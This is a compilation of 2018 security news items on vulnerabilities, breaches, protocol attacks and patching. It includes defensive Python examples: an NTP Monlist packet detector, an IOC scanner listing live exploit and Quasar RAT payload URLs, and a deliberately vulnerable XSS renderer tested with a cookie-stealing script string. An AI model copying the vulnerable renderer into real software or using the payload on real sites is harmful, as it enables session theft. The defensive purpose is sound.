The software market is competitive, and a recent IBM study argued that developers are not necessarily experts in security. As a result, applications are often rushed to release before they can be adequately protected from security vulnerabilities.

The report recommended a strategy that starts with evaluating how important an application is to a particular business or user, scoring the potential risks and then ensuring that the right tools are in place to test and fix any security vulnerabilities that are discovered. Security professionals should regularly review this strategy to gauge the organization’s preparedness for threats such as remote code execution before they happen.

Source: Cisco Talos

The post Researchers Find 18 Security Vulnerabilities in Foxit PDF Reader appeared first on Security Intelligence.

GitLab API Vulnerability Leaked Confidential Data On Public Projects

GitLab – a web-based repository manager – has recently patched a critical flaw in its API that posed a security

GitLab API Vulnerability Leaked Confidential Data On Public Projects on Latest Hacking News.

Watch out! The risks associated with BGP, FTP, and NTP protocols

Most of the news about attacks that use basic Internet protocols focuses on the World Wide Web. This means that HTTP and DNS are usually the key players, and as such, many policies, and a lot of the cybersecurity software in use, are mainly focused on these protocols. However, there are also risks related to other protocols that can also be used by cybercriminals as attack vectors. These protocols are BGP, NTP and FTP. All three can mean real risks for a company’s information, and at times they don’t receive the attention they deserve given the potential threat that they can pose. Below, we’ll look into what each of them implies and how cyberattackers can use them.

BGP

The Border Gateway Protocol is used to exchange routing information between autonomous systems, that is, the groups of IP networks that each have their own independent routing policies. Essentially, it is how the large networks that make up the Internet (ISPs, cloud and hosting providers, large enterprises) tell each other which IP prefixes they can reach, so that traffic can be forwarded between any two points on the network. One of the risks related to this protocol is that, for the vast majority of users, it is invisible and complex; companies only start to work with it directly when they run their own large-scale networks.

An example of an attack using this protocol was the hijack that leaked information from cryptocurrency wallets, as the provider Cloudflare explained. In general, the cyberattacker announces the victim company’s or user’s IP prefixes (or a more specific prefix, which routers prefer) from a network under the attacker’s control, so the rest of the Internet is “tricked” into redirecting traffic bound for those addresses to the attacker. Whatever the network then sends to the victim, including users’ requests and the responses to them, flows to the cyberattacker instead, who can read, alter or impersonate the service.

[Diagram of the attack (Source: Cloudflare)]

NTP

The Network Time Protocol (NTP) is mainly used to synchronize clocks on the computers on a network. However, older versions of the NTP daemon on some networks also expose a monitoring feature: the “monlist” command, a mode 7 control query, returns a list of up to 600 hosts that have recently connected to the server. Cyberattackers leverage this feature in a reflection and amplification attack: they send small monlist requests whose source IP address is forged to be the victim’s, so the server sends its much larger reply to the victim rather than to the attacker. Repeated across many open NTP servers, this produces a distributed denial of service (DDoS) attack that can leave the victim’s connection temporarily out of action.

FTP

Although HTTP is used more and more often to send files, the old File Transfer Protocol (FTP) is still present on many systems and in many companies. Since it was never designed as a secure transfer protocol (credentials and file contents travel in plaintext), it has many weaknesses that attackers can take advantage of. This is exactly what happened last year: the FBI warned of attacks on FTP servers belonging to hospitals and dental clinics that aimed to access patients’ medical records by abusing anonymous FTP. A server configured for anonymous access accepts a generic user name such as “anonymous” or “ftp” with any (or no) password, so anyone on the Internet can read whatever has been left in the exposed directories.

How to avoid attacks via these protocols

As we mentioned above, these protocols are targeted by cyberattackers less often than HTTP, but that doesn’t mean they will stop posing a risk to companies. This is why organizations should follow some general guidelines to prevent attacks that use them.

  • Adoption of MANRS: the MANRS (Mutually Agreed Norms for Routing Security) are a joint initiative created by network operators and Internet exchange points (IXPs) with the aim of developing stronger routing security to avoid, among other things, BGP attacks. Any large company that has broad control over its networks and nodes should adopt them.
  • Updating networks and their protocols: the most common attacks over NTP happen because outdated versions are being used. The same thing happens with FTP, since it is a primitive protocol that, by default, wasn’t designed with encryption for the exchange of files (for this there are encrypted variants such as FTPS). IT teams in companies should use the most up-to-date versions of these protocols in order to avoid potential cyberattacks.
  • Correct configuration of servers: an incorrectly configured FTP server can give cyberattackers a way in if it lets them connect in anonymous mode. An FTP server configured to require a strong password is already a harder barrier for the attacker. In the same way, an NTP server can leave its list of hosts exposed if access to it is not correctly restricted.
  • Advanced cybersecurity solutions: as well as all the above, it is vital that companies of any size have an advanced cybersecurity solution active on all endpoints – one that is able to prevent, detect, and neutralize attacks at all times.
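The two server-side misconfigurations named in the list above (an NTP server that still answers Monlist queries and an FTP server that accepts anonymous logins) can be checked mechanically. The following is an added example, not code from the Panda Security post: a small defender-side audit that reads ntpd and vsftpd configuration text and flags the weak settings, plus a packet check that recognises NTP mode 7 Monlist requests of the kind used for reflection. The configuration samples and packet bytes are constructed for this example; the `disable monitor`, `restrict default ... noquery`, `anonymous_enable` and `ssl_enable` directives are the real ntpd and vsftpd keywords.

```python
import re

# --- ntpd: the "monitor" facility is what serves Monlist. "disable monitor"
# turns it off; "restrict default ... noquery" blocks remote mode 6/7 queries.
def audit_ntp_conf(text: str) -> list:
    findings = []
    lines = [l.split("#", 1)[0].strip() for l in text.splitlines()]
    monitor_disabled = any(re.fullmatch(r"disable\s+.*\bmonitor\b.*", l) for l in lines)
    default_noquery = any(
        l.startswith("restrict default") and "noquery" in l.split() for l in lines
    )
    if not monitor_disabled:
        findings.append("ntp: 'monitor' facility not disabled (add 'disable monitor')")
    if not default_noquery:
        findings.append("ntp: no 'restrict default ... noquery' line (remote Monlist queries allowed)")
    return findings

# --- vsftpd: anonymous_enable defaults to YES when the key is absent, so a
# missing key is treated as weak; ssl_enable=YES is what turns on FTPS.
def audit_vsftpd_conf(text: str) -> list:
    findings = []
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip().lower()] = value.strip().upper()
    if settings.get("anonymous_enable", "YES") == "YES":
        findings.append("ftp: anonymous logins enabled (set anonymous_enable=NO)")
    if settings.get("ssl_enable", "NO") != "YES":
        findings.append("ftp: TLS not enabled (set ssl_enable=YES for FTPS)")
    return findings

# --- NTP mode 7 (private/monitor) header, 8 bytes minimum:
#   byte 0 = R(1) M(1) VN(3) Mode(3), byte 2 = implementation, byte 3 = request code.
# Request codes 20 (MON_GETLIST) and 42 (MON_GETLIST_1) are the Monlist queries.
MON_GETLIST_CODES = {20, 42}

def is_monlist_request(payload: bytes) -> bool:
    """True when the UDP payload is a mode 7 request asking for the monitor list."""
    if len(payload) < 8:
        return False
    mode = payload[0] & 0x07
    is_response = bool(payload[0] & 0x80)   # R bit set means a server reply
    return mode == 7 and not is_response and payload[3] in MON_GETLIST_CODES

# Constructed samples (not real server configs or captures).
WEAK_NTP_CONF = "driftfile /var/lib/ntp/drift\nserver 0.pool.ntp.org\n"
HARDENED_NTP_CONF = "disable monitor\nrestrict default kod nomodify notrap nopeer noquery\n"
WEAK_VSFTPD_CONF = "listen=YES\nanonymous_enable=YES\n"
HARDENED_VSFTPD_CONF = "listen=YES\nanonymous_enable=NO\nssl_enable=YES\n"
MONLIST_PROBE = bytes.fromhex("1700032a") + bytes(4)   # VN=2, mode 7, impl 3, req 42
MONLIST_REPLY = bytes.fromhex("9700032a") + bytes(4)   # same, but R bit set
CLIENT_QUERY = b"\x1b" + bytes(47)                     # ordinary mode 3 client packet

def audit_samples() -> dict:
    """Run every check over the constructed samples; used by the demo below."""
    return {
        "weak_ntp": audit_ntp_conf(WEAK_NTP_CONF),
        "hardened_ntp": audit_ntp_conf(HARDENED_NTP_CONF),
        "weak_ftp": audit_vsftpd_conf(WEAK_VSFTPD_CONF),
        "hardened_ftp": audit_vsftpd_conf(HARDENED_VSFTPD_CONF),
        "probe_flagged": is_monlist_request(MONLIST_PROBE),
        "reply_flagged": is_monlist_request(MONLIST_REPLY),
        "client_flagged": is_monlist_request(CLIENT_QUERY),
    }

if __name__ == "__main__":
    for name, result in audit_samples().items():
        print(f"{name}: {result}")
```

The packet check is what a monitoring probe or IDS preprocessor would apply to inbound UDP/123 traffic: a burst of mode 7 request code 42 packets from many sources is the signature of a server being used as a reflector, while the configuration audit catches the problem before it is reachable at all.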

The post Watch out! The risks associated with BGP, FTP, and NTP protocols appeared first on Panda Security Mediacenter.

Cisco Patched Two Critical Vulnerabilities in Digital Network Architecture Center

This week, Cisco patched two critical security vulnerabilities in the Digital Network Architecture Center. The patches come alongside massive updates for

Cisco Patched Two Critical Vulnerabilities in Digital Network Architecture Center on Latest Hacking News.

SQL Injection Exposed Data From Canadian ISP – Altima Telecom

Handling customer data requires a lot of caution by organizations. A slight negligence or glitch in the data security system

SQL Injection Exposed Data From Canadian ISP – Altima Telecom on Latest Hacking News.

Adobe October Patch Update Fixed 86 Different Security Vulnerabilities

In an attempt to prove their vigilance for security, Adobe has once again addressed a number of security flaws that

Adobe October Patch Update Fixed 86 Different Security Vulnerabilities on Latest Hacking News.

Vulnerability Spotlight: Google PDFium JBIG2 Image ComposeToOpt2WithRect Information Disclosure Vulnerability

Discovered by Aleksandar Nikolic of Cisco Talos

Overview

Cisco Talos is releasing details of a new vulnerability in Google PDFium's JBIG2 library. An exploitable heap out-of-bounds read vulnerability exists in the JBIG2-parsing code in Google Chrome, version 67.0.3396.99. A specially crafted PDF document can trigger an out-of-bounds read, which can possibly lead to an information leak. That leak could be used as part of an exploit. An attacker needs to trick the user into visiting a malicious site to trigger the vulnerability.

In accordance with our coordinated disclosure policy, Cisco Talos has worked with Google to ensure that these issues have been resolved and that an update has been made available for affected users. It is recommended that this update is applied as quickly as possible to ensure that systems are no longer affected by this vulnerability.

Vulnerability Details

Google PDFium JBIG2 Image ComposeToOpt2WithRect Information Disclosure Vulnerability (TALOS-2018-0639 / CVE-2018-16076)

PDFium is an open-source PDF renderer developed by Google and used extensively in the Chrome browser, as well as other online services and standalone applications. This bug was fixed in the latest Git version, as well as the latest Chromium address sanitizer build available.

A heap buffer overflow is present in the code responsible for decoding a JBIG2 image stream. An attacker needs to provide a specific PDF that describes the JBIG2 image details in order to exploit this vulnerability. Detailed vulnerability information can be found here.

Known vulnerable versions

Google Chrome version 67.0.3396.99

https://chromereleases.googleblog.com/2018/09/stable-channel-update-for-desktop.html

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 47340 - 47341

NotPetya Horror Story Highlights Need for Holistic Security

The NotPetya malware’s ability to cripple even sophisticated, global firms is a cautionary tale about the need for businesses to understand their risk and take a holistic view of security says Fadi Albatal, Chief Strategy Officer at Hitachi Systems Security.* If you’re keen on information security and happen to enjoy horror stories, point...


Apple iOS 12 Texting Bug Sends Messages To Wrong Contacts

Apple’s iOS 12 seems in trouble these days. On one hand, we see people discovering security vulnerabilities, such as those

Apple iOS 12 Texting Bug Sends Messages To Wrong Contacts on Latest Hacking News.

Foxit PDF Reader Fixes High-Severity Remote Code Execution Flaws

Foxit Software has patched over 100 vulnerabilities in its popular Foxit PDF Reader. Many of the bugs tackled by the company include a wide array of high severity remote code execution vulnerabilities. Foxit on Friday released fixes for Foxit Reader 9.3 and Foxit PhantomPDF 9.3, which addressed a whopping 124 vulnerabilities. It’s important to note […]

Episode 114: Complexity at Root of Facebook Breach and LoJax is a RAT You Can’t Kill

In this week’s podcast: Facebook revealed that a breach affected 50 million accounts and as many as 90 million users. Is complexity at the root of the social media giant’s troubles? We speak with Gary McGraw of the firm Synopsys about it. Also: BIOS-based malware has been demonstrated at security conferences for years. Last week, the...


SecurityWeek RSS Feed: Passcode Bypass Method Exposes Photos, Contacts on iPhone XS

An iPhone enthusiast has disclosed yet another method for bypassing the iPhone lockscreen. The latest technique has been confirmed to work on the new iPhone XS running the latest version of Apple’s mobile operating system, iOS 12.


Complicated iOS 12 Passcode Bypass Exposes iPhone Data To Hackers

Apple’s latest iOS 12 was seemingly outstanding with its extra security features and user data privacy and security. However, one cannot

Complicated iOS 12 Passcode Bypass Exposes iPhone Data To Hackers on Latest Hacking News.

Telegram Patched IP Address Leak Problem In Its Desktop Client

Telegram has become increasingly popular worldwide due to its secure nature. The provision of encrypted conversations, both in texts as

Telegram Patched IP Address Leak Problem In Its Desktop Client on Latest Hacking News.

Facebook: How to minimize the risk of vulnerabilities

Facebook: how to avoid the risks of vulnerabilities

In the last few months, the world’s most popular social network has faced several problems when it comes to data protection. In July of this year, the Information Commissioner’s Office (ICO) in the UK imposed a £500,000 fine on Facebook for its role in the Cambridge Analytica case. This was the maximum possible fine, given that the incident occurred before the implementation of the GDPR.

Now, a new data protection scandal has rocked the Internet giant. Last Friday, as Guy Rosen, VP of Product Management, explained, almost 50 million accounts were exposed to an attack that happened on Tuesday September 25. The attack was made possible by a vulnerability in the video uploading function that also affected the “View as” function, which allows people to see what their own profile looks like to other users. This vulnerability would have allowed the attackers to steal users’ access tokens – a kind of key that means users don’t have to re-enter their passwords every time they access the site. Theoretically, with these tokens, an attacker could gain access to any third-party app that uses Facebook to log in.

Facebook, the initial response to the attack

It didn’t take long for Facebook to react – they notified the Data Protection Commission (DPC) in Ireland, where the company’s European headquarters are located. Under the rules of the GDPR, a company is obliged to inform of a data breach within 72 hours of its discovery. However, the DPC has said that it needs more information about the attack, such as the number of European users affected and the risk that they face, in order to carry out their investigation.

Since the incident happened after the GDPR came into force, the social network could face a fine of up to 4% of the annual worldwide turnover of the preceding financial year, which, in the case of Facebook, would be $1.63 billion (€1.4 billion). But this economic sanction isn’t the only repercussion; we can also add the reputational damage that the firm will suffer, another key aspect in this kind of incident. Many users will lose confidence in the company thanks to this data breach, and this loss of confidence may turn into a loss of clients and money.

Personal data, fuel for companies

There’s no doubt that personal information is power, and means serious money. How companies process and use this data is varied and sophisticated, and is very lucrative. Business of this kind is very simple: we hand over information in return for a service. But the service is paid for with our personal data. And organizations are responsible for looking out for our safety when it comes to possible cybercrimes whose ultimate goal is to compromise our privacy, such as phishing, digital identity theft, or the exploitation of unpatched vulnerabilities, as was the case in this latest incident.

With all of this in mind, it may seem that it is now easier than ever to be the victim of a cyberattack. While this is true to a certain extent, it is also true that prevention, detection, response and remediation systems are more and more efficient. Panda Adaptive Defense, for example, combines solutions and services to optimize protection, reduce the attack surface, and minimize the impact of these threats.

And the fact is that, with the number of documented glitches and vulnerabilities – now up to 20,000 cases, a 38% increase compared to five years ago – the first thing to bear in mind is limiting the attack surface. At tech giants such as Facebook, this may seem like a pipe dream. But keeping confidential information safe from theft or hijacking – even if it’s an exorbitant amount, as is the case with the 50 million Facebook profiles – is possible today thanks to solutions such as Panda Patch Management, the new module of Adaptive Defense, which reduces the complexity of managing patches and updates in operating systems and hundreds of third-party applications.

What’s more, Panda Patch Management helps companies to comply with the accountability principle. Many regulations, such as GDPR, HIPAA and PCI, require organizations to take the appropriate technical and organizational measures to ensure proper protection of the sensitive data under their control, as is the case with Facebook. Thanks to real-time updates, this module provides visibility of the health of endpoints in terms of pending vulnerabilities and updates for the system, allowing it to get ahead of exploits of these vulnerabilities.

How to protect your company

  • Hackers exploit vulnerabilities in unpatched programs. Keep your software and devices up-to-date.
  • Having an automatic vulnerability detection solution reduces the possibility of suffering a security breach by up to 20%.
  • Get absolute control of personal data and protect your pocket: with the GDPR, correct, speedy management by the DPO will save you economic sanctions and reputational damage.
  • The ability to efficiently and quickly compile detailed reports with the information about an incident of this type – how, when, and how much – is very important to facilitate the work of data protection agencies. The module Panda Data Control allows you to discover, audit and monitor unstructured personal data on the endpoints in your company.

The post Facebook: How to minimize the risk of vulnerabilities appeared first on Panda Security Mediacenter.

Mutagen Astronomy – Linux Vulnerability Hits CentOS, Debian, and Red Hat Distros

Researchers have discovered a critical vulnerability that allegedly affects multiple Linux distros. The vulnerability named Mutagen Astronomy allows an attacker

Mutagen Astronomy – Linux Vulnerability Hits CentOS, Debian, and Red Hat Distros on Latest Hacking News.

Apple DEP Authentication Flaw Leaves Devices Vulnerable To Malicious MDM Enrolling

Researchers discovered a vulnerability in the Apple’s Device Enrollment Program (DEP). This Apple DEP authentication flaw could allow potential attackers

Apple DEP Authentication Flaw Leaves Devices Vulnerable To Malicious MDM Enrolling on Latest Hacking News.

Mojave Flaws Allow An Attacker To Bypass Full Disk Access Requirement

Right after the launch of the latest MacOS Mojave, researchers have begun discovering various security vulnerabilities. Amidst the claims of

Mojave Flaws Allow An Attacker To Bypass Full Disk Access Requirement on Latest Hacking News.

Critical Security Vulnerability in Facebook Affects 50 million Users!

Facebook recently released a press update about a critical security flaw affecting its application, which they promptly fixed after it

Critical Security Vulnerability in Facebook Affects 50 million Users! on Latest Hacking News.

Millions of accounts affected in latest Facebook hack

Facebook announced earlier today that its social network had been hacked, resulting in 40 million accounts that were directly impacted, while another 50 million were also considered to be potentially affected.

Attackers exploited a feature in Facebook called “View As,” which essentially shows how your profile looks to others. The flaw enabled them to get ahold of so-called Access Tokens, which allowed them to be logged in as genuine Facebook users without having to use their password.

The feature has for now been turned off and the underlying vulnerability fixed. A law enforcement investigation is ongoing to determine the full scope of this hack and identify the eventual perpetrators.

Facebook says they have taken action and that there is no need for users to reset their passwords, although it is a good opportunity to remind users that passwords should be complex and not reused across multiple services.

We recommend people follow the Facebook hack story to get a better idea of what exactly was accessed and take the necessary precautions. We will keep Labs readers informed of further developments.

The post Millions of accounts affected in latest Facebook hack appeared first on Malwarebytes Labs.

The consequences of not applying patches

The digital transformation makes the task of reducing the attack surface more difficult, given the exponential growth in users, devices, systems, and third-party applications that need to be updated. As a consequence, the range of possible cyberthreats is considerably larger. The costs that these attacks entail for businesses and users add to the problem: it is estimated that by 2021 the cost of cybercrime will reach $6 trillion.

But as well as sharing a goal of making money, many of the most costly cyberincidents in the last few years have shared another characteristic: they have been made possible thanks to an unpatched vulnerability in an IT system.

Discover Panda Patch Management

In this article we’ve compiled some of the most infamous vulnerabilities and the problems they’ve caused for the IT systems where they’ve been found.

EternalBlue

One of the most problematic vulnerabilities of the last year is one that affects Microsoft Server Message Block (SMB). It is called EternalBlue, and it was allegedly developed by the US National Security Agency (NSA). It came to light in April 2017, when the hacking group the Shadow Brokers revealed that the NSA was collecting vulnerabilities of this kind. And the list of attacks that have been made possible by this vulnerability is extensive.

The most famous use was WannaCry, which affected over 300,000 companies all over the world, and cost a total of around $4 billion. The malware NotPetya, which came to light just a month later, was able to get onto systems thanks to this vulnerability, stealing passwords in order to take control of the network that it accessed.

And we’re not just talking about ransomware: shortly after the WannaCry attacks, we started to see a piece of malware called Adylkuzz, which used EternalBlue to download a series of commands onto infected computers. These commands were then used to mine and extract cryptocurrencies.

EternalRomance

Bad Rabbit, another ransomware, shared many elements of the code found in NotPetya. However, this time it exploited another vulnerability – also developed by the NSA and also in SMB – called EternalRomance. The attack mainly affected users in Eastern Europe and Russia.

At the start of this year, the Winter Olympics in Pyeongchang experienced a cyberattack. During the opening ceremony, attackers interfered with the Internet connection, the website of the games, and television services. In order to carry this out, those behind the attack made use of EternalRomance.

Recent cyberattack trends such as cryptojacking have taken advantage of these vulnerabilities to spread. The malware PyRoMine used EternalRomance to infect computers and use their CPU to mine the cryptocurrency Monero.

How could these attacks have been avoided? The answer is simple: a patch for all these vulnerabilities was available months before the incidents. However, many organizations have trouble applying the right patches, or don’t have patching policies, which means that vulnerabilities of this kind may go unnoticed. What’s more, EternalBlue is still threatening unpatched systems.

Web applications

In 2017, cybercriminals used a vulnerability in the software Apache Struts to launch a piece of ransomware called Cerber. According to some sources, they made over $100,000 in Bitcoin thanks to this ransomware. And this wasn’t the only use of this vulnerability in Apache Struts.

Personal data breaches

Though ransomware and malware may be the most attention grabbing results of an unpatched vulnerability, they’re far from the only consequences. Some of the most serious exfiltrations of personal data have been a direct result of unpatched IT systems.

In 2017, the US company Equifax revealed that it had lost the personal data of over 145 million people, in one of the largest breaches of this kind in history. The cause of this breach? The same vulnerability in Apache Struts that had been used by Cerber. According to Equifax, the blame fell on an employee who didn’t apply the relevant patch – a patch that was available two months before the breach and would have been enough to stop it from happening.

This case is not the only one. The insurance company Nationwide Mutual Insurance agreed to a $5.5 million payout for a breach of the data of 1.27 million people in 2012 – a breach that was also made possible by a vulnerability in a web application for which a patch had been available three years before the incident.

The phone company Carphone Warehouse faced a £400,000 fine for a breach that it suffered in 2015, that was facilitated by a vulnerability in the version of WordPress that the company was using, which hadn’t been updated since 2009.

In fact, according to a study, over 80% of personal data breaches are the result of poor patch management. This means that a company can significantly reduce the risk of suffering this kind of incident by implementing an efficient patching policy.

The solution?

One of the reasons that companies have trouble finding and applying relevant patches is a lack of resources and time. What’s more, a lot of the time it is difficult to prioritize which patches to apply first.

However, although we have seen just a few examples here, the fact is that the majority of attacks and exploits take advantage of outdated systems and third-party applications, exploiting known vulnerabilities for which an update was available weeks, or even months, before the breach.

With Panda Patch Management you can be sure of always having the most relevant patches installed. Patch Management automatically searches for necessary patches to keep the devices on your system safe, prioritizing the most urgent updates. This way you can avoid incidents, systematically reducing the attack surface created by vulnerabilities, applying critical updates immediately from the cloud console.

Download the product sheet here

The post The consequences of not applying patches appeared first on Panda Security Mediacenter.

Report: Hacking Risk for Connected Vehicles Shows Significant Decline

Smart vehicles are less vulnerable than they were a few years ago, thanks to improvements in security according to a new report from the security firm IOActive. IOActive conducted vulnerability assessments of real-world vehicle systems for its “Commonalities in Vehicle Vulnerabilities 2018 Remix” paper, and found that both the...


Buggy implementation of CVE-2018-8373 vulnerability used to deliver Quasar RAT

A variant of a remote code execution vulnerability in Internet Explorer’s scripting engine, known as CVE-2018-8373 and patched last August, has been found in the wild. Looking at the IOCs posted by our colleagues at TrendMicro, we recognized the infrastructure serving this exploit. The same static domain has been active since at least early July, and is being redirected to from an adult website injected with a malicious script.

In the below traffic capture from August, we were served CVE-2018-8174, which is thought to be from the same author. It is interesting to note that this is not an exploit kit, but rather appears to be a single actor who implemented the available Proof of Concept to distribute his payload, the Quasar Remote Administration Tool (RAT).

During our tests with this new variant of CVE-2018-8373, we found it to be quite unstable and failing to detonate its payload via PowerShell invocation. However, a working CVE-2018-8174 was still serving the same payload we had captured back in August.

The source code for CVE-2018-8373 has been uploaded to many platforms already (PasteBin, VirusTotal), including to the AnyRun sandbox. That sample triggers the exploit and spawns PowerShell. In the following animation, we replayed this attack to show how our anti-exploit technology is able to mitigate this vulnerability at various levels.

We can expect that other threat actors will be looking at this code for possible implementation. However, unless it is improved, it is unlikely to be integrated into exploit kits, considering that its cousin, CVE-2018-8174, works flawlessly.

Indicators of compromise

Injected adult site

198.211.33[.]67
clubtubes[.]com

Exploit serving domain

54.191.17[.]130
myswcd[.]com/vol/m3.html,CVE-2018-8373
myswcd[.]com/vol/m2.html,CVE-2018-8174
myswcd[.]com/vol/me.html,CVE-2018-8174

Payload

myswcd[.]com/vol/s1.exe,Loader
myswcd[.]com/vol/v1.exe,Installer
myswcd[.]com/vol/v2.exe,Quasar RAT
7EEF6EF8FED53B7C3BF61BA821F375A0A433EA4CB0185FD223780B729A9A5792
268909BC33F0F8C5312B51570016311E3676AF651A57DE38E42241DCC177B2D6
D9A967D0CAA8DB86FECA3AE469EF6797E81DFDAC4D8531658CB242A87C80CE05
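The indicators listed above are only useful once they are matched against something. As an added example (not part of the Malwarebytes post), the block below refangs the published network indicators, checks a proxy log for the injected site, the exploit-serving host and the payload URLs, and checks a file inventory for the three payload hashes. The indicators are copied from the post; the log format, log lines and the file inventory are constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Network indicators as published, defanged with "[.]" (copied from the post).
DEFANGED_NETWORK_IOCS = [
    "198.211.33[.]67",               # injected adult site
    "clubtubes[.]com",
    "54.191.17[.]130",               # exploit serving host
    "myswcd[.]com/vol/m3.html",      # CVE-2018-8373
    "myswcd[.]com/vol/m2.html",      # CVE-2018-8174
    "myswcd[.]com/vol/me.html",      # CVE-2018-8174
    "myswcd[.]com/vol/s1.exe",       # loader
    "myswcd[.]com/vol/v1.exe",       # installer
    "myswcd[.]com/vol/v2.exe",       # Quasar RAT
]
PAYLOAD_SHA256 = {
    "7EEF6EF8FED53B7C3BF61BA821F375A0A433EA4CB0185FD223780B729A9A5792",
    "268909BC33F0F8C5312B51570016311E3676AF651A57DE38E42241DCC177B2D6",
    "D9A967D0CAA8DB86FECA3AE469EF6797E81DFDAC4D8531658CB242A87C80CE05",
}

def refang(ioc: str) -> str:
    """Undo the usual defanging ("[.]" and "hxxp") so the value can be matched."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")

def build_indicator_sets():
    """Split indicators into bare hosts/IPs and (host, path) URL pairs."""
    hosts, url_paths = set(), set()
    for ioc in DEFANGED_NETWORK_IOCS:
        clean = refang(ioc)
        if "/" in clean:
            host, _, path = clean.partition("/")
            hosts.add(host)
            url_paths.add((host, "/" + path))
        else:
            hosts.add(clean)
    return hosts, url_paths

# Constructed proxy log format: "<timestamp> <client_ip> <dest_ip> <method> <url>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")

def scan_proxy_log(lines):
    """Return (timestamp, client_ip, reason) for every line touching an indicator.
    Most specific match wins: exact URL, then hostname, then destination IP."""
    hosts, url_paths = build_indicator_sets()
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                      # skip lines that are not in the expected format
        ts, client, dest_ip, _method, url = m.groups()
        parts = urlsplit(url)
        host = parts.hostname or ""
        reason = None
        if (host, parts.path) in url_paths:
            reason = f"known exploit/payload URL {host}{parts.path}"
        elif host in hosts:
            reason = f"known host {host}"
        elif dest_ip in hosts:
            reason = f"known IP {dest_ip}"
        if reason:
            hits.append((ts, client, reason))
    return hits

def scan_hashes(inventory):
    """inventory: iterable of (path, sha256_hex); comparison is case-insensitive."""
    return [(path, digest) for path, digest in inventory if digest.upper() in PAYLOAD_SHA256]

# Constructed sample data (not a real capture); 203.0.113.5 is a documentation address.
SAMPLE_PROXY_LOG = [
    "2018-10-02T10:15:01Z 10.0.0.23 198.211.33.67 GET http://clubtubes.com/index.html",
    "2018-10-02T10:15:03Z 10.0.0.23 54.191.17.130 GET http://myswcd.com/vol/m2.html",
    "2018-10-02T10:15:09Z 10.0.0.23 54.191.17.130 GET http://myswcd.com/vol/v2.exe",
    "2018-10-02T10:16:00Z 10.0.0.42 203.0.113.5 GET http://example.com/",
]
SAMPLE_HASH_INVENTORY = [
    ("C:\\Users\\alice\\AppData\\Local\\Temp\\v2.exe",
     "7eef6ef8fed53b7c3bf61ba821f375a0a433ea4cb0185fd223780b729a9a5792"),
    ("C:\\Windows\\System32\\notepad.exe", "00" * 32),
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("proxy:", hit)
    for hit in scan_hashes(SAMPLE_HASH_INVENTORY):
        print("file:", hit)
```

Matching the full URL first matters here because the exploit pages and the payload binaries live on the same host: a hit on `/vol/v2.exe` tells the responder that the RAT was downloaded, whereas a hit on the hostname alone only says the client reached the server.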

The post Buggy implementation of CVE-2018-8373 vulnerability used to deliver Quasar RAT appeared first on Malwarebytes Labs.

Firefox DoS Proven to Crash Browsers and Sometimes Even Users’ PCs

Last week, a security researcher pointed out how a CSS-based attack could crash iPhones, iPads, and Mac devices. The same

Firefox DoS Proven to Crash Browsers and Sometimes Even Users PC’s on Latest Hacking News.

United Nations Mistakenly Exposed Sensitive Data to The Public

After a lot of organizations and spy firms confessing accidental exposure of their data, the recent incident lists an even

United Nations Mistakenly Exposed Sensitive Data to The Public on Latest Hacking News.

Podcast Episode 113: SAP CSO Justin Somaini and Election Hacks – No Voting Machines Required!

Everybody worries about hacked voting machines. But an exercise in Boston last week showed how hackers can compromise the vote without ever touching an election system. Also: October is just around the corner and that means Cyber Security Awareness Month is upon us. So what are top cyber security professionals “aware of” these days? We talk...


Your Web Applications Are More Vulnerable Than You Think

A recent study shined a light on an attack vector that is often overlooked: the insecurity of web applications.

According to the report, issued by Positive Technologies, 44 percent of web applications are vulnerable to data leakage and security problems. In other words, threat actors have easy access to the personal customer data those applications handle across a variety of verticals such as banking, e-commerce and communications.

In addition, 48 percent of the applications were found to be vulnerable to unauthorized access, with 17 percent having exploits that could result in a full takeover by a threat actor. But perhaps the most eye-opening finding is that 100 percent of the web applications tested had some sort of vulnerability in general.

Security as an Afterthought

The web app as an attack vector isn’t a new problem, although we may not have realized how severe the vulnerabilities were. And worse, we’ve allowed the problem to linger: Many developers and IT decision-makers don’t take web app security seriously. Mozilla gave 93 percent of websites it observed a failing grade for security against cross-site scripting (XSS), for example. Application security tends to be treated as an afterthought, pushed behind other, more pressing security issues.

The biggest problem, no matter the programming language used, is XSS, according to the report. The authors also pointed to data leakage, fingerprinting and brute-force attacks as common issues across the board.
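Because the report singles out XSS as the most common flaw, here is an added example (not from the Security Intelligence article or the Positive Technologies report) of the reflected XSS pattern it describes, shown as a vulnerable handler beside its hardened form. The small render functions, the checker and the sample input are constructed for this example; `html.escape` is the Python standard-library encoder.

```python
import html
import re

def render_search_unsafe(query: str) -> str:
    # Vulnerable: user-controlled text is concatenated into HTML unencoded,
    # so a query containing markup becomes part of the page.
    return f"<p>Results for: {query}</p>"

def render_search_safe(query: str) -> str:
    # Hardened: encode for the HTML text context. quote=True also encodes
    # quotes, so the same helper is safe inside a quoted attribute value.
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"

def render_link_safe(url: str, label: str) -> str:
    # A URL context needs its own rule: encoding alone does not stop a
    # "javascript:" href, so restrict the scheme first, then encode.
    if not re.match(r"^https?://", url, re.IGNORECASE):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'

_ACTIVE_MARKUP = re.compile(r"<\s*script\b|\son\w+\s*=", re.IGNORECASE)

def contains_active_markup(rendered: str) -> bool:
    """Crude check used only to compare the renderers: does the output carry an
    unencoded <script> tag or an on*= event-handler attribute?"""
    return bool(_ACTIVE_MARKUP.search(rendered))

# Constructed test input: the classic XSS probe string.
CONSTRUCTED_INPUT = "<script>alert(document.cookie)</script>"

if __name__ == "__main__":
    print("unsafe :", render_search_unsafe(CONSTRUCTED_INPUT))
    print("safe   :", render_search_safe(CONSTRUCTED_INPUT))
    print("link   :", render_link_safe("javascript:alert(1)", "profile"))
```

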